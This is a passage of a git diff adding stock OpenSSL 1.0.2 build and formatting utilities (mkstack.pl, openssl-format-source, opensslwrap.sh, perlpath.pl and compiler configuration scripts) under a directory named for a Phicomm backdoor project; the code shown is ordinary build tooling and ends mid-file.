+$filename = $ARGV[0]; $filename =~ /(.*)\.([^.]+)$/;
+$basename = $1;
+$extname  = $2;
+
+if ($extname =~ /dll/i)	{ $description = "OpenSSL shared library"; }
+else			{ $description = "OpenSSL application";    }
+
+print <<___;
+#include <winver.h>
+
+LANGUAGE 0x09,0x01
+
+1 VERSIONINFO
+  FILEVERSION $v1,$v2,$v3,$v4
+  PRODUCTVERSION $v1,$v2,$v3,$v4
+  FILEFLAGSMASK 0x3fL
+#ifdef _DEBUG
+  FILEFLAGS 0x01L
+#else
+  FILEFLAGS 0x00L
+#endif
+  FILEOS VOS__WINDOWS32
+  FILETYPE VFT_DLL
+  FILESUBTYPE 0x0L
+BEGIN
+    BLOCK "StringFileInfo"
+    BEGIN
+        BLOCK "040904b0"
+        BEGIN
+            // Required:
+            VALUE "CompanyName", "The OpenSSL Project, http://www.openssl.org/\\0"
+            VALUE "FileDescription", "$description\\0"
+            VALUE "FileVersion", "$version\\0"
+            VALUE "InternalName", "$basename\\0"
+            VALUE "OriginalFilename", "$filename\\0"
+            VALUE "ProductName", "The OpenSSL Toolkit\\0"
+            VALUE "ProductVersion", "$version\\0"
+            // Optional:
+            //VALUE "Comments", "\\0"
+            VALUE "LegalCopyright", "Copyright © 1998-2006 The OpenSSL Project. Copyright © 1995-1998 Eric A. Young, Tim J. Hudson. All rights reserved.\\0"
+            //VALUE "LegalTrademarks", "\\0"
+            //VALUE "PrivateBuild", "\\0"
+            //VALUE "SpecialBuild", "\\0"
+        END
+    END
+    BLOCK "VarFileInfo"
+    BEGIN
+        VALUE "Translation", 0x409, 0x4b0
+    END
+END
+___
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkstack.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkstack.pl
new file mode 100755
index 0000000..2bd96cd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkstack.pl
@@ -0,0 +1,194 @@
+#!/usr/local/bin/perl -w
+
+# This is a utility that searches out "DECLARE_STACK_OF()"
+# declarations in .h and .c files, and updates/creates/replaces
+# the corresponding macro declarations in crypto/stack/safestack.h.
+# As it's not generally possible to have macros that generate macros,
+# we need to control this from the "outside", here in this script.
+#
+# Geoff Thorpe, June, 2000 (with massive Perl-hacking
+#                           help from Steve Robb)
+
+my $safestack = "crypto/stack/safestack";
+
+my $do_write;
+while (@ARGV) {
+	my $arg = $ARGV[0];
+	if($arg eq "-write") {
+		$do_write = 1;
+	}
+	shift @ARGV;
+}
+
+
+@source = (<crypto/*.[ch]>, <crypto/*/*.[ch]>, <ssl/*.[ch]>, <apps/*.[ch]>);
+foreach $file (@source) {
+	next if -l $file;
+
+	# Open the .c/.h file for reading
+	open(IN, "< $file") || die "Can't open $file for reading: $!";
+
+	while(<IN>) {
+		if (/^DECLARE_STACK_OF\(([^)]+)\)/) {
+			push @stacklst, $1;
+		}
+	        if (/^DECLARE_SPECIAL_STACK_OF\(([^,\s]+)\s*,\s*([^>\s]+)\)/) {
+		    	push @sstacklst, [$1, $2];
+		}
+		if (/^DECLARE_ASN1_SET_OF\(([^)]+)\)/) {
+			push @asn1setlst, $1;
+		}
+		if (/^DECLARE_PKCS12_STACK_OF\(([^)]+)\)/) {
+			push @p12stklst, $1;
+		}
+		if (/^DECLARE_LHASH_OF\(([^)]+)\)/) {
+			push @lhashlst, $1;
+		}
+	}
+	close(IN);
+}
+
+
+
+my $old_stackfile = "";
+my $new_stackfile = "";
+my $inside_block = 0;
+my $type_thing;
+
+open(IN, "< $safestack.h") || die "Can't open input file: $!";
+while(<IN>) {
+	$old_stackfile .= $_;
+
+	if (m|^/\* This block of defines is updated by util/mkstack.pl, please do not touch! \*/|) {
+		$inside_block = 1;
+	}
+	if (m|^/\* End of util/mkstack.pl block, you may now edit :-\) \*/|) {
+		$inside_block = 0;
+	} elsif ($inside_block == 0) {
+		$new_stackfile .= $_;
+	}
+	next if($inside_block != 1);
+	$new_stackfile .= "/* This block of defines is updated by util/mkstack.pl, please do not touch! */";
+		
+	foreach $type_thing (sort @stacklst) {
+		$new_stackfile .= <<EOF;
+
+#define sk_${type_thing}_new(cmp) SKM_sk_new($type_thing, (cmp))
+#define sk_${type_thing}_new_null() SKM_sk_new_null($type_thing)
+#define sk_${type_thing}_free(st) SKM_sk_free($type_thing, (st))
+#define sk_${type_thing}_num(st) SKM_sk_num($type_thing, (st))
+#define sk_${type_thing}_value(st, i) SKM_sk_value($type_thing, (st), (i))
+#define sk_${type_thing}_set(st, i, val) SKM_sk_set($type_thing, (st), (i), (val))
+#define sk_${type_thing}_zero(st) SKM_sk_zero($type_thing, (st))
+#define sk_${type_thing}_push(st, val) SKM_sk_push($type_thing, (st), (val))
+#define sk_${type_thing}_unshift(st, val) SKM_sk_unshift($type_thing, (st), (val))
+#define sk_${type_thing}_find(st, val) SKM_sk_find($type_thing, (st), (val))
+#define sk_${type_thing}_find_ex(st, val) SKM_sk_find_ex($type_thing, (st), (val))
+#define sk_${type_thing}_delete(st, i) SKM_sk_delete($type_thing, (st), (i))
+#define sk_${type_thing}_delete_ptr(st, ptr) SKM_sk_delete_ptr($type_thing, (st), (ptr))
+#define sk_${type_thing}_insert(st, val, i) SKM_sk_insert($type_thing, (st), (val), (i))
+#define sk_${type_thing}_set_cmp_func(st, cmp) SKM_sk_set_cmp_func($type_thing, (st), (cmp))
+#define sk_${type_thing}_dup(st) SKM_sk_dup($type_thing, st)
+#define sk_${type_thing}_pop_free(st, free_func) SKM_sk_pop_free($type_thing, (st), (free_func))
+#define sk_${type_thing}_deep_copy(st, copy_func, free_func) SKM_sk_deep_copy($type_thing, (st), (copy_func), (free_func))
+#define sk_${type_thing}_shift(st) SKM_sk_shift($type_thing, (st))
+#define sk_${type_thing}_pop(st) SKM_sk_pop($type_thing, (st))
+#define sk_${type_thing}_sort(st) SKM_sk_sort($type_thing, (st))
+#define sk_${type_thing}_is_sorted(st) SKM_sk_is_sorted($type_thing, (st))
+EOF
+	}
+
+	foreach $type_thing (sort @sstacklst) {
+	    my $t1 = $type_thing->[0];
+	    my $t2 = $type_thing->[1];
+	    $new_stackfile .= <<EOF;
+
+#define sk_${t1}_new(cmp) ((STACK_OF($t1) *)sk_new(CHECKED_SK_CMP_FUNC($t2, cmp)))
+#define sk_${t1}_new_null() ((STACK_OF($t1) *)sk_new_null())
+#define sk_${t1}_push(st, val) sk_push(CHECKED_STACK_OF($t1, st), CHECKED_PTR_OF($t2, val))
+#define sk_${t1}_find(st, val) sk_find(CHECKED_STACK_OF($t1, st), CHECKED_PTR_OF($t2, val))
+#define sk_${t1}_value(st, i) (($t1)sk_value(CHECKED_STACK_OF($t1, st), i))
+#define sk_${t1}_num(st) SKM_sk_num($t1, st)
+#define sk_${t1}_pop_free(st, free_func) sk_pop_free(CHECKED_STACK_OF($t1, st), CHECKED_SK_FREE_FUNC($t2, free_func))
+#define sk_${t1}_deep_copy(st, copy_func, free_func) ((STACK_OF($t1) *)sk_deep_copy(CHECKED_STACK_OF($t1, st), CHECKED_SK_COPY_FUNC($t2, copy_func), CHECKED_SK_FREE_FUNC($t2, free_func)))
+#define sk_${t1}_insert(st, val, i) sk_insert(CHECKED_STACK_OF($t1, st), CHECKED_PTR_OF($t2, val), i)
+#define sk_${t1}_free(st) SKM_sk_free(${t1}, st)
+#define sk_${t1}_set(st, i, val) sk_set(CHECKED_STACK_OF($t1, st), i, CHECKED_PTR_OF($t2, val))
+#define sk_${t1}_zero(st) SKM_sk_zero($t1, (st))
+#define sk_${t1}_unshift(st, val) sk_unshift(CHECKED_STACK_OF($t1, st), CHECKED_PTR_OF($t2, val))
+#define sk_${t1}_find_ex(st, val) sk_find_ex((_STACK *)CHECKED_CONST_PTR_OF(STACK_OF($t1), st), CHECKED_CONST_PTR_OF($t2, val))
+#define sk_${t1}_delete(st, i) SKM_sk_delete($t1, (st), (i))
+#define sk_${t1}_delete_ptr(st, ptr) ($t1 *)sk_delete_ptr(CHECKED_STACK_OF($t1, st), CHECKED_PTR_OF($t2, ptr))
+#define sk_${t1}_set_cmp_func(st, cmp)  \\
+	((int (*)(const $t2 * const *,const $t2 * const *)) \\
+	sk_set_cmp_func(CHECKED_STACK_OF($t1, st), CHECKED_SK_CMP_FUNC($t2, cmp)))
+#define sk_${t1}_dup(st) SKM_sk_dup($t1, st)
+#define sk_${t1}_shift(st) SKM_sk_shift($t1, (st))
+#define sk_${t1}_pop(st) ($t2 *)sk_pop(CHECKED_STACK_OF($t1, st))
+#define sk_${t1}_sort(st) SKM_sk_sort($t1, (st))
+#define sk_${t1}_is_sorted(st) SKM_sk_is_sorted($t1, (st))
+
+EOF
+	}
+
+	foreach $type_thing (sort @asn1setlst) {
+		$new_stackfile .= <<EOF;
+
+#define d2i_ASN1_SET_OF_${type_thing}(st, pp, length, d2i_func, free_func, ex_tag, ex_class) \\
+	SKM_ASN1_SET_OF_d2i($type_thing, (st), (pp), (length), (d2i_func), (free_func), (ex_tag), (ex_class)) 
+#define i2d_ASN1_SET_OF_${type_thing}(st, pp, i2d_func, ex_tag, ex_class, is_set) \\
+	SKM_ASN1_SET_OF_i2d($type_thing, (st), (pp), (i2d_func), (ex_tag), (ex_class), (is_set))
+#define ASN1_seq_pack_${type_thing}(st, i2d_func, buf, len) \\
+	SKM_ASN1_seq_pack($type_thing, (st), (i2d_func), (buf), (len))
+#define ASN1_seq_unpack_${type_thing}(buf, len, d2i_func, free_func) \\
+	SKM_ASN1_seq_unpack($type_thing, (buf), (len), (d2i_func), (free_func))
+EOF
+	}
+	foreach $type_thing (sort @p12stklst) {
+		$new_stackfile .= <<EOF;
+
+#define PKCS12_decrypt_d2i_${type_thing}(algor, d2i_func, free_func, pass, passlen, oct, seq) \\
+	SKM_PKCS12_decrypt_d2i($type_thing, (algor), (d2i_func), (free_func), (pass), (passlen), (oct), (seq))
+EOF
+	}
+
+	foreach $type_thing (sort @lhashlst) {
+		my $lc_tt = lc $type_thing;
+		$new_stackfile .= <<EOF;
+
+#define lh_${type_thing}_new() LHM_lh_new(${type_thing},${lc_tt})
+#define lh_${type_thing}_insert(lh,inst) LHM_lh_insert(${type_thing},lh,inst)
+#define lh_${type_thing}_retrieve(lh,inst) LHM_lh_retrieve(${type_thing},lh,inst)
+#define lh_${type_thing}_delete(lh,inst) LHM_lh_delete(${type_thing},lh,inst)
+#define lh_${type_thing}_doall(lh,fn) LHM_lh_doall(${type_thing},lh,fn)
+#define lh_${type_thing}_doall_arg(lh,fn,arg_type,arg) \\
+  LHM_lh_doall_arg(${type_thing},lh,fn,arg_type,arg)
+#define lh_${type_thing}_error(lh) LHM_lh_error(${type_thing},lh)
+#define lh_${type_thing}_num_items(lh) LHM_lh_num_items(${type_thing},lh)
+#define lh_${type_thing}_down_load(lh) LHM_lh_down_load(${type_thing},lh)
+#define lh_${type_thing}_node_stats_bio(lh,out) \\
+  LHM_lh_node_stats_bio(${type_thing},lh,out)
+#define lh_${type_thing}_node_usage_stats_bio(lh,out) \\
+  LHM_lh_node_usage_stats_bio(${type_thing},lh,out)
+#define lh_${type_thing}_stats_bio(lh,out) \\
+  LHM_lh_stats_bio(${type_thing},lh,out)
+#define lh_${type_thing}_free(lh) LHM_lh_free(${type_thing},lh)
+EOF
+	}
+
+	$new_stackfile .= "/* End of util/mkstack.pl block, you may now edit :-) */\n";
+	$inside_block = 2;
+}
+
+
+if ($new_stackfile eq $old_stackfile) {
+	print "No changes to $safestack.h.\n";
+	exit 0; # avoid unnecessary rebuild
+}
+
+if ($do_write) {
+	print "Writing new $safestack.h.\n";
+	open OUT, ">$safestack.h" || die "Can't open output file";
+	print OUT $new_stackfile;
+	close OUT;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/openssl-format-source b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/openssl-format-source
new file mode 100755
index 0000000..4e90147
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/openssl-format-source
@@ -0,0 +1,148 @@
+#!/bin/sh
+#
+# openssl-format-source 
+# - format source tree according to OpenSSL coding style using indent
+#
+# usage:
+#   openssl-format-source [-v] [-n] [file|directory] ...
+#
+# note: the indent options assume GNU indent v2.2.10 which was released
+#       Feb-2009 so if you have an older indent the options may not 
+#	match what is expected
+#
+# any marked block comment blocks have to be moved to align manually after
+# the reformatting has been completed as marking a block causes indent to 
+# not move it at all ...
+#
+
+PATH=/usr/local/bin:/bin:/usr/bin:$PATH
+export PATH
+HERE="`dirname $0`"
+
+set -e
+
+if [ $# -eq 0 ]; then
+  echo "usage: $0 [-v] [-n] [-c] [sourcefile|sourcedir] ..." >&2
+  exit 1
+fi
+
+VERBOSE=false
+DONT=false
+STOPARGS=false
+COMMENTS=false
+DEBUG=""
+
+# for this exercise, we want to force the openssl style, so we roll
+# our own indent profile, which is at a well known location
+INDENT_PROFILE="$HERE/indent.pro"
+export INDENT_PROFILE
+if [ ! -f "$INDENT_PROFILE" ]; then
+  echo "$0: unable to locate the openssl indent.pro file" >&2
+  exit 1
+fi
+
+# Extra arguments; for adding the comment-formatting
+INDENT_ARGS=""
+for i 
+do
+  if [ "$STOPARGS" != "true" ]; then
+    case $i in
+      --) STOPARGS="true"; continue;;
+      -n) DONT="true"; continue;;
+      -v) VERBOSE="true"; 
+	  echo "INDENT_PROFILE=$INDENT_PROFILE";
+	  continue;;
+      -c) COMMENTS="true"; 
+      	  INDENT_ARGS="-fc1 -fca -cdb -sc"; 
+	  continue;;
+      -nc) COMMENTS="true";
+	  continue;;
+      -d) DEBUG='eval tee "$j.pre" |'
+	  continue;;
+    esac
+  fi
+
+  if [ -d "$i" ]; then
+    LIST=`find "$i" -name '*.[ch]' -print`
+  else 
+    if [ ! -f "$i" ]; then
+      echo "$0: source file not found: $i" >&2
+      exit 1
+    fi
+    LIST="$i"
+  fi
+  
+  for j in $LIST
+  do
+    # ignore symlinks - we only ever process the base file - so if we
+    # expand a directory tree we need to ignore any located symlinks
+    if [ -d "$i" ]; then
+      if [ -h "$j" ]; then
+	continue;
+      fi
+    fi
+
+    if [ "$VERBOSE" = "true" ]; then
+      echo "$j"
+    fi
+
+    if [ "$DONT" = "false" ]; then
+      tmp=$(mktemp /tmp/indent.XXXXXX)
+      trap 'rm -f "$tmp"' HUP INT TERM EXIT
+
+      case `basename $j` in 
+	# the list of files that indent is unable to handle correctly
+	# that we simply leave alone for manual formatting now
+	obj_dat.h|aes_core.c|aes_x86core.c|ecp_nistz256.c)
+	  echo "skipping $j"
+	  ;;
+	*)
+	  if [ "$COMMENTS" = "true" ]; then
+	    # we have to mark single line comments as /*- ...*/ to stop indent
+	    # messing with them, run expand then indent as usual but with the
+	    # the process-comments options and then undo that marking, and then 
+	    # finally re-run indent without process-comments so the marked-to-
+	    # be-ignored comments we did automatically end up getting moved 
+	    # into the right possition within the code as indent leaves marked 
+	    # comments entirely untouched - we appear to have no way to avoid 
+	    # the double processing and get the desired output
+	    cat "$j" | \
+	    expand | \
+	    perl -0 -np \
+	      -e 's/(\n#[ \t]*ifdef[ \t]+__cplusplus\n[^\n]*\n#[ \t]*endif\n)/\n\/**INDENT-OFF**\/$1\/**INDENT-ON**\/\n/g;' \
+	      -e 's/(\n\/\*\!)/\n\/**/g;' \
+	      -e 's/(STACK_OF|LHASH_OF)\(([^ \t,\)]+)\)( |\n)/$1_$2_$3/g;' \
+	      | \
+	    perl -np \
+	      -e 's/^([ \t]*)\/\*([ \t]+.*)\*\/[ \t]*$/if (length("$1$2")<75) {$c="-"}else{$c=""}; "$1\/*$c$2*\/"/e;' \
+	      -e 's/^\/\* ((Copyright|=|----).*)$/\/*-$1/;' \
+	      -e 's/^((DECLARE|IMPLEMENT)_(EXTERN_ASN1|ASN1|ADB|STACK_OF|PKCS12_STACK_OF).*)$/\/**INDENT-OFF**\/\n$1\n\/**INDENT-ON**\//;' \
+	      -e 's/^([ \t]*(make_dh|make_dh_bn|make_rfc5114_td)\(.*\)[ \t,]*)$/\/**INDENT-OFF**\/\n$1\n\/**INDENT-ON**\//;' \
+	      -e 's/^(ASN1_ADB_TEMPLATE\(.*)$/\/**INDENT-OFF**\/\n$1\n\/**INDENT-ON**\//;' \
+	      -e 's/^((ASN1|ADB)_.*_END\(.*[\){=,;]+[ \t]*)$/$1\n\/**INDENT-ON**\//;' \
+	      -e '/ASN1_(ITEM_ref|ITEM_ptr|ITEM_rptr|PCTX)/ || s/^((ASN1|ADB)_[^\*]*[){=,]+[ \t]*)$/\/**INDENT-OFF**\/\n$1/;' \
+	      -e 's/^(} (ASN1|ADB)_[^\*]*[\){=,;]+)$/$1\n\/**INDENT-ON**\//;' \
+	      | \
+	      $DEBUG indent $INDENT_ARGS | \
+	      perl -np \
+		-e 's/^([ \t]*)\/\*-(.*)\*\/[ \t]*$/$1\/*$2*\//;' \
+		-e 's/^\/\*-((Copyright|=|----).*)$/\/* $1/;' \
+	      | indent | \
+	      perl -0 -np \
+		-e 's/\/\*\*INDENT-(ON|OFF)\*\*\/\n//g;' \
+	      | perl -np \
+	        -e 's/(STACK_OF|LHASH_OF)_([^ \t,]+)_( |\/)/$1($2)$3/g;' \
+	        -e 's/(STACK_OF|LHASH_OF)_([^ \t,]+)_$/$1($2)/g;' \
+	      | perl "$HERE"/su-filter.pl \
+	      > "$tmp"
+	  else
+	    expand "$j" | indent $INDENT_ARGS > "$tmp"
+	  fi;
+	  mv "$tmp" "$j"
+	  ;;
+      esac
+    fi
+  done
+done
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/opensslwrap.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/opensslwrap.sh
new file mode 100755
index 0000000..b27cbb8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/opensslwrap.sh
@@ -0,0 +1,26 @@
+#!/bin/sh
+
+HERE="`echo $0 | sed -e 's|[^/]*$||'`"
+OPENSSL="${HERE}../apps/openssl"
+
+if [ -d "${HERE}../engines" -a "x$OPENSSL_ENGINES" = "x" ]; then
+	OPENSSL_ENGINES="${HERE}../engines"; export OPENSSL_ENGINES
+fi
+
+if [ -x "${OPENSSL}.exe" ]; then
+	# The original reason for this script existence is to work around
+	# certain caveats in run-time linker behaviour. On Windows platforms
+	# adjusting $PATH used to be sufficient, but with introduction of
+	# SafeDllSearchMode in XP/2003 the only way to get it right in
+	# *all* possible situations is to copy newly built .DLLs to apps/
+	# and test/, which is now done elsewhere... The $PATH is adjusted
+	# for backward compatibility (and nostagical reasons:-).
+	if [ "$OSTYPE" != msdosdjgpp ]; then
+		PATH="${HERE}..:$PATH"; export PATH
+	fi
+	exec "${OPENSSL}.exe" "$@"
+elif [ -x "${OPENSSL}" -a -x "${HERE}shlib_wrap.sh" ]; then
+	exec "${HERE}shlib_wrap.sh" "${OPENSSL}" "$@"
+else
+	exec "${OPENSSL}" "$@"	# hope for the best...
+fi
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/perlpath.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/perlpath.pl
new file mode 100755
index 0000000..a1f236b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/perlpath.pl
@@ -0,0 +1,35 @@
+#!/usr/local/bin/perl
+#
+# modify the '#!/usr/local/bin/perl'
+# line in all scripts that rely on perl.
+#
+
+require "find.pl";
+
+$#ARGV == 0 || print STDERR "usage: perlpath newpath  (eg /usr/bin)\n";
+&find(".");
+
+sub wanted
+	{
+	return unless /\.pl$/ || /^[Cc]onfigur/;
+
+	open(IN,"<$_") || die "unable to open $dir/$_:$!\n";
+	@a=<IN>;
+	close(IN);
+
+	if (-d $ARGV[0]) {
+		$a[0]="#!$ARGV[0]/perl\n";
+	}
+	else {
+		$a[0]="#!$ARGV[0]\n";
+	}
+
+	# Playing it safe...
+	$new="$_.new";
+	open(OUT,">$new") || die "unable to open $dir/$new:$!\n";
+	print OUT @a;
+	close(OUT);
+
+	rename($new,$_) || die "unable to rename $dir/$new:$!\n";
+	chmod(0755,$_) || die "unable to chmod $dir/$new:$!\n";
+	}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/BC-32.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/BC-32.pl
new file mode 100644
index 0000000..ed28e65
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/BC-32.pl
@@ -0,0 +1,139 @@
+#!/usr/local/bin/perl
+# Borland C++ builder 3 and 4 -- Janez Jere <jj@void.si>
+#
+
+$ssl=	"ssleay32";
+$crypto="libeay32";
+
+$o='\\';
+$cp='copy';
+$rm='del';
+
+# C compiler stuff
+$cc='bcc32';
+$lflags="-ap -Tpe -x -Gn ";
+$mlflags='';
+
+$out_def="out32";
+$tmp_def="tmp32";
+$inc_def="inc32";
+#enable max error messages, disable most common warnings
+$cflags="-DWIN32_LEAN_AND_MEAN -q -w-ccc -w-rch -w-pia -w-aus -w-par -w-inl  -c -tWC -tWM -DOPENSSL_SYSNAME_WIN32 -DL_ENDIAN -DDSO_WIN32 -D_stricmp=stricmp -D_strnicmp=strnicmp ";
+if ($debug)
+{
+    $cflags.="-Od -y -v -vi- -D_DEBUG";
+    $mlflags.=' ';
+}
+else
+{
+    $cflags.="-O2 -ff -fp";
+}
+
+$obj='.obj';
+$ofile="-o";
+
+# EXE linking stuff
+$link="ilink32";
+$efile="";
+$exep='.exe';
+if ($no_sock)
+	{ $ex_libs=""; }
+else	{ $ex_libs="cw32mt.lib import32.lib crypt32.lib ws2_32.lib"; }
+
+# static library stuff
+$mklib='tlib /P64';
+$ranlib='';
+$plib="";
+$libp=".lib";
+$shlibp=($shlib)?".dll":".lib";
+$lfile='';
+
+$shlib_ex_obj="";
+$app_ex_obj="c0x32.obj"; 
+
+$asm=(`nasm -v 2>NUL` ge `nasmw -v 2>NUL`?"nasm":"nasmw")." -f obj -d__omf__";
+$asm.=" -g" if $debug;
+$afile='-o';
+
+$bn_mulw_obj='';
+$bn_mulw_src='';
+$des_enc_obj='';
+$des_enc_src='';
+$bf_enc_obj='';
+$bf_enc_src='';
+
+if (!$no_asm)
+	{
+	$bn_mulw_obj='crypto\bn\asm\bn_win32.obj';
+	$bn_mulw_src='crypto\bn\asm\bn_win32.asm';
+	$des_enc_obj='crypto\des\asm\d_win32.obj crypto\des\asm\y_win32.obj';
+	$des_enc_src='crypto\des\asm\d_win32.asm crypto\des\asm\y_win32.asm';
+	$bf_enc_obj='crypto\bf\asm\b_win32.obj';
+	$bf_enc_src='crypto\bf\asm\b_win32.asm';
+	$cast_enc_obj='crypto\cast\asm\c_win32.obj';
+	$cast_enc_src='crypto\cast\asm\c_win32.asm';
+	$rc4_enc_obj='crypto\rc4\asm\r4_win32.obj';
+	$rc4_enc_src='crypto\rc4\asm\r4_win32.asm';
+	$rc5_enc_obj='crypto\rc5\asm\r5_win32.obj';
+	$rc5_enc_src='crypto\rc5\asm\r5_win32.asm';
+	$md5_asm_obj='crypto\md5\asm\m5_win32.obj';
+	$md5_asm_src='crypto\md5\asm\m5_win32.asm';
+	$sha1_asm_obj='crypto\sha\asm\s1_win32.obj';
+	$sha1_asm_src='crypto\sha\asm\s1_win32.asm';
+	$rmd160_asm_obj='crypto\ripemd\asm\rm_win32.obj';
+	$rmd160_asm_src='crypto\ripemd\asm\rm_win32.asm';
+	$cflags.=" -DBN_ASM -DMD5_ASM -DSHA1_ASM -DRMD160_ASM";
+	}
+
+if ($shlib)
+	{
+	$mlflags.=" $lflags /dll";
+#	$cflags =~ s| /MD| /MT|;
+	$lib_cflag=" /GD -D_WINDLL -D_DLL";
+	$out_def="out32dll";
+	$tmp_def="tmp32dll";
+	}
+
+sub do_lib_rule
+	{
+	local($objs,$target,$name,$shlib)=@_;
+	local($ret,$Name);
+
+	$taget =~ s/\//$o/g if $o ne '/';
+	($Name=$name) =~ tr/a-z/A-Z/;
+
+#	$target="\$(LIB_D)$o$target";
+	$ret.="$target: $objs\n";
+	if (!$shlib)
+		{
+		$ret.=<<___;
+	-\$(RM) $lfile$target
+	\$(MKLIB) $lfile$target \@&&!
++\$(**: = &^
++)
+!
+___
+		}
+	else
+		{
+		local($ex)=($target =~ /O_SSL/)?' $(L_CRYPTO)':'';
+		$ex.=' ws2_32.lib gdi32.lib';
+		$ret.="\t\$(LINK) \$(MLFLAGS) $efile$target /def:ms/${Name}.def @<<\n  \$(SHLIB_EX_OBJ) $objs $ex\n<<\n";
+		}
+	$ret.="\n";
+	return($ret);
+	}
+
+sub do_link_rule
+	{
+	local($target,$files,$dep_libs,$libs)=@_;
+	local($ret,$_);
+	
+	$file =~ s/\//$o/g if $o ne '/';
+	$n=&bname($targer);
+	$ret.="$target: $files $dep_libs\n";
+	$ret.="\t\$(LINK) \$(LFLAGS) $files \$(APP_EX_OBJ), $target,, $libs\n\n";
+	return($ret);
+	}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/Mingw32.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/Mingw32.pl
new file mode 100644
index 0000000..fe3fb27
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/Mingw32.pl
@@ -0,0 +1,104 @@
+#!/usr/local/bin/perl
+#
+# Mingw32.pl -- Mingw
+#
+
+$o='/';
+$cp='cp';
+$rm='rm -f';
+$mkdir='gmkdir';
+
+$o='\\';
+$cp='copy';
+$rm='del';
+$mkdir='mkdir';
+
+# C compiler stuff
+
+$cc='gcc';
+if ($debug)
+	{ $cflags="-DL_ENDIAN -DDSO_WIN32 -g2 -ggdb"; }
+else
+	{ $cflags="-DL_ENDIAN -DDSO_WIN32 -fomit-frame-pointer -O3 -mcpu=i486 -Wall"; }
+
+if ($gaswin and !$no_asm)
+	{
+        $bn_asm_obj='$(OBJ_D)\bn-win32.o';
+        $bn_asm_src='crypto/bn/asm/bn-win32.s';
+        $bnco_asm_obj='$(OBJ_D)\co-win32.o';
+        $bnco_asm_src='crypto/bn/asm/co-win32.s';
+        $des_enc_obj='$(OBJ_D)\d-win32.o $(OBJ_D)\y-win32.o';
+        $des_enc_src='crypto/des/asm/d-win32.s crypto/des/asm/y-win32.s';
+        $bf_enc_obj='$(OBJ_D)\b-win32.o';
+        $bf_enc_src='crypto/bf/asm/b-win32.s';
+#       $cast_enc_obj='$(OBJ_D)\c-win32.o';
+#       $cast_enc_src='crypto/cast/asm/c-win32.s';
+        $rc4_enc_obj='$(OBJ_D)\r4-win32.o';
+        $rc4_enc_src='crypto/rc4/asm/r4-win32.s';
+        $rc5_enc_obj='$(OBJ_D)\r5-win32.o';
+        $rc5_enc_src='crypto/rc5/asm/r5-win32.s';
+        $md5_asm_obj='$(OBJ_D)\m5-win32.o';
+        $md5_asm_src='crypto/md5/asm/m5-win32.s';
+        $rmd160_asm_obj='$(OBJ_D)\rm-win32.o';
+        $rmd160_asm_src='crypto/ripemd/asm/rm-win32.s';
+        $sha1_asm_obj='$(OBJ_D)\s1-win32.o';
+        $sha1_asm_src='crypto/sha/asm/s1-win32.s';
+	$cflags.=" -DBN_ASM -DMD5_ASM -DSHA1_ASM -DOPENSSL_BN_ASM_PART_WORDS";
+	}
+
+
+$obj='.o';
+$ofile='-o ';
+
+# EXE linking stuff
+$link='${CC}';
+$lflags='${CFLAGS}';
+$efile='-o ';
+$exep='';
+$ex_libs="-lws2_32 -lgdi32";
+
+# static library stuff
+$mklib='ar r';
+$mlflags='';
+$ranlib='ranlib';
+$plib='lib';
+$libp=".a";
+$shlibp=".a";
+$lfile='';
+
+$asm='as';
+$afile='-o ';
+#$bn_asm_obj="";
+#$bn_asm_src="";
+#$des_enc_obj="";
+#$des_enc_src="";
+#$bf_enc_obj="";
+#$bf_enc_src="";
+
+sub do_lib_rule
+	{
+	local($obj,$target,$name,$shlib)=@_;
+	local($ret,$_,$Name);
+
+	$target =~ s/\//$o/g if $o ne '/';
+	$target="$target";
+	($Name=$name) =~ tr/a-z/A-Z/;
+
+	$ret.="$target: \$(${Name}OBJ)\n";
+	$ret.="\tif exist $target \$(RM) $target\n";
+	$ret.="\t\$(MKLIB) $target \$(${Name}OBJ)\n";
+	$ret.="\t\$(RANLIB) $target\n\n";
+	}
+
+sub do_link_rule
+	{
+	local($target,$files,$dep_libs,$libs)=@_;
+	local($ret,$_);
+	
+	$file =~ s/\//$o/g if $o ne '/';
+	$n=&bname($target);
+	$ret.="$target: $files $dep_libs\n";
+	$ret.="\t\$(LINK) ${efile}$target \$(LFLAGS) $files $libs\n\n";
+	return($ret);
+	}
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/OS2-EMX.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/OS2-EMX.pl
new file mode 100644
index 0000000..28cd116
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/pl/OS2-EMX.pl
@@ -0,0 +1,120 @@
+#!/usr/local/bin/perl
+#
+# OS2-EMX.pl - for EMX GCC on OS/2
+#
+
+$o='/';
+$cp='cp';
+$rm='rm -f';
+
+$preamble = "SHELL=sh\n";
+
+# C compiler stuff
+
+$cc='gcc';
+$cflags="-DL_ENDIAN -O3 -fomit-frame-pointer -m486 -Zmtd -Wall ";
+$cflags.="-Zomf " if $shlib;
+$shl_cflag="-Zdll";
+
+if ($debug) { 
